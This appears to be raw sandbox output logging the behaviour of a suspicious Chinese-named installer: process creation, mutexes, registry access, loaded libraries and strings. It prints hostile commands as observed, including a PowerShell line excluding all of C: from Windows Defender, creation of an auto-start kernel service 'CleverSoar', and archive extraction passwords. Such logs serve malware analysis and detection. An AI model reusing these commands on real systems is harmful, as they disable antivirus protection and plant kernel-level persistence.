Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EA3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00E99252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC45240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | File created: C:\Program Files (x86)\Windows NT\is-83E4T.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4552:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4876:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5208:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4156:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5484:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4892:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5892:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:800:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6496:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3048:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3064:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3540:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2404:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5396:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2896:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6228:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2188:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1280:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1464:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3532:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2532:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5368:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3984:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6112:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | File created: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr | Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr | Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Process created: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$103DE,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Process created: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$203E4,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$103DE,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$203E4,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: winsta.dll
